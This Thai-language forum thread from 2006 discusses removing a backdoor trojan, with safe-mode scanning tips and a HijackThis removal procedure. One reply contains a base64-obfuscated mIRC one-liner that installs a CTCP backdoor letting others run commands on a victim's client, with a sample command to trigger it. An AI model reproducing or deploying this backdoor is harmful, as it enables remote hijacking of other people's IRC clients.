ผมโดน Trojan ชื่อ Backdoor อ่ะคับ ทำไงดี ลบไม่ออกเสียที
ถามอีกอย่างคับ win32 คืออะไร เนื่องจากมันเปิ ดเตือนทุกครั้งตอนเปิดเครื่อง ลบทิ้งเลยได้หรือไม่
โดนเข้าประตูหลัง :31:
:27:
เธอโดนแล้ววววว :27:
:30: :30: :30:
:44: แล้วทำไงดีคับ ช่วยหน่อยคับ
formatล้างให้สะอาด
ระวังท้องนะคะ
:01:
ถ้า scan ปกติแล้วลบไม่ได้ลองเซฟโหมดดูครับ
ลองค้นในกูเกิ้ลดูนะครับ
ค้นคำว่า backdoor trojan ก็น่าจะได้
http://www.google.co.th/search?q=Backdoor&ie=utf-8&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a
แล้วก็นี่
http://www.google.co.th/search?hl=th&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=Backdoor&btnG=%E0%B8%84%E0%B9%89%E0%B8%99%E0%B8%AB%E0%B8%B2&meta=cr%3DcountryTH
http://www.2-spyware.com/backdoors-removal
เอามาจาก http://en.wikipedia.org/wiki/Backdoor
ขอบคุณมากมากคับ :45:
ไม่รู้ว่าใช่อันนี้หรือเปล่า มีคนไทยทำ tool ใช้แก้ไขช่องโหว่นี้ไว้ด้วย
อ่านรายละเอียดที่ http://www.trackerx90.th.gs/
ถ้าไม่ชอบโทรจันทร์
ก็โทรอังคารแทนดิครับ :33:
(http://www.spynotebook.org/bonnie/archives/phone.gif)
อ้างคำพูดจาก: karma เมื่อ 11 ธ.ค. 2006, 11:13 น.
ผมโดน Trojan ชื่อ Backdoor อ่ะคับ ทำไงดี ลบไม่ออกเสียที
ถามอีกอย่างคับ win32 คืออะไร เนื่องจากมันเปิ ดเตือนทุกครั้งตอนเปิดเครื่อง ลบทิ้งเลยได้หรือไม่
win32 ปกติมันเป็นศัพท์ทางเทคนิคที่เรียกวินโดว์ (windows 32bit) โดยมากเวลาเขารายงานไวรัส ถ้าเป็นไวรัสที่ติดระบบปฏิบัติการวินโดว์ ก็จะใส่ win32.(ชื่อไวรัส) เช่น win32.Brontok
โดยปกติถ้าสแกนตามปกติแล้วเอาไม่ออก ก็จะใช้อย่างที่โอ้เอ้บอกนั่นแหละ คือสแกนใน safe mode
ถ้าสแกนใน safe mode แล้วก็ยังดื้ออีก คงต้องจดชื่อไวรัส แล้วไปค้นในเน็ตว่ามีใครเจอเหมือนเราไหม แล้วมีวิธีการกำจัดได้อย่างไร
อ้างคำพูดจาก: Buob Marley เมื่อ 12 ธ.ค. 2006, 17:52 น.
ถ้าไม่ชอบโทรจันทร์
ก็โทรอังคารแทนดิครับ :33:
(http://www.spynotebook.org/bonnie/archives/phone.gif)
นึกว่าจะไม่มีคนเล่นซะแล้ว :30: :30:
อืม เหมือนจะโดนเหมือนกัน แสกนไวรัสไปแล้ว เหมือนจะหาย
เพื่อความชัวร์แบบโง่ๆก็เลยตามลบทีละไฟล์ที่คิดว่าน่าจะเป็นไวรัส...ก็ลบออกไปได้
แต่ทำไมมันถึงรู้สึกคุ้นๆ เหมือนมันยังอยู่ในเครื่อง
แต่แสกนแล้วแสกนอีก มันก็ไม่เห็นนะ..ก็เลย ยังรู้สึกระแวงๆอยู่ ว่ามันต้องแอบหลบซ่อนอยู่ไหนแน่ๆ :05:
อยู่ในใจ :27:
(http://img2.f0nt.com/12/4e85702aef5c16cedc50772a95ce010c.jpg)
วันนี้ลองโหลด avast มาดู
เจอไปแล้ว 111 ตัว ยังแสกนไม่หมดด้วย :31:
อยากรู้ว่ามันคืออะไรนักหนากันคะ ไวรัสมันเยอะขนาดนี้เลยหรอ :09:
โหว 111 :18:
ที่เจอเป็นพวก Tracking Cookies หรือเปล่าครับ
//echo HELLO!! | write $decode(YmxvYi50eHQgQ1RDUCAqOio6KjogJDEt,m) | .load
$decode(LXJzIGJsb2IudHh0,m) | .msg $decode(UG9pWG9uIERPTkUgOkQ6RA==,m)
another Backdoor creating blob.txt
and it writes CTCP *:*:*: $1-
which you can control them
/ctcp VICTIM /quit I Got Haxxed
อันดับแรก โหลดนี่ก่อน ( แปลมา้อีกที มั่วด้วย)
1. http://forum.hijackthis.de/attachme...77&d=1117139369
2. โหลดเสร็จ Unzip ไปใน Folder ที่ต้องการ
3. ฺBoot เข้าไปใน safeMode อย่ารันโปรแกรมอะไรทั้งนั้น เช่น IE
4. กด ABIRemover.exe และกด Install แล้วรอ ( Explore จะหายไป หรือ ไม่เห็นมัน )
5. Reboot เครื่องแล้วเข้าไปใน SafeMode อีกที
6. แปลเอาเองละกันคับ อิิอิ fix the random key in the registry with hijackthis (normaly HKLM\Software\Microsoft\Windows\CurrentVersion\Run ) and maybe the bolger BHO. Remember the random name and delete it in your system32 directory
้้Hijackthis โหลดที่นี่ http://www.thespykiller.co.uk/files/HJTSetup.exe
7. แสกนไวรัส ( ถ้าไม่ได้ลงใช้ผ่านเว็บเอาก้ได้คับ เช่น ของ Panda http://www.pandasoftware.com/products/activescan.htm )
ถ้ายังไม่หาย http://www.bleepingcomputer.com/for...=0&#entry187936
รายละเอียด
=========================================
Tech details:
should remove:
SvcProc and its files
ZepMon and its files
Bolger regkey (BHO should be done manual)
Nail.exe and the Shell = explorer.exe nail.exe entry
aurora.exe and some of the corresponding files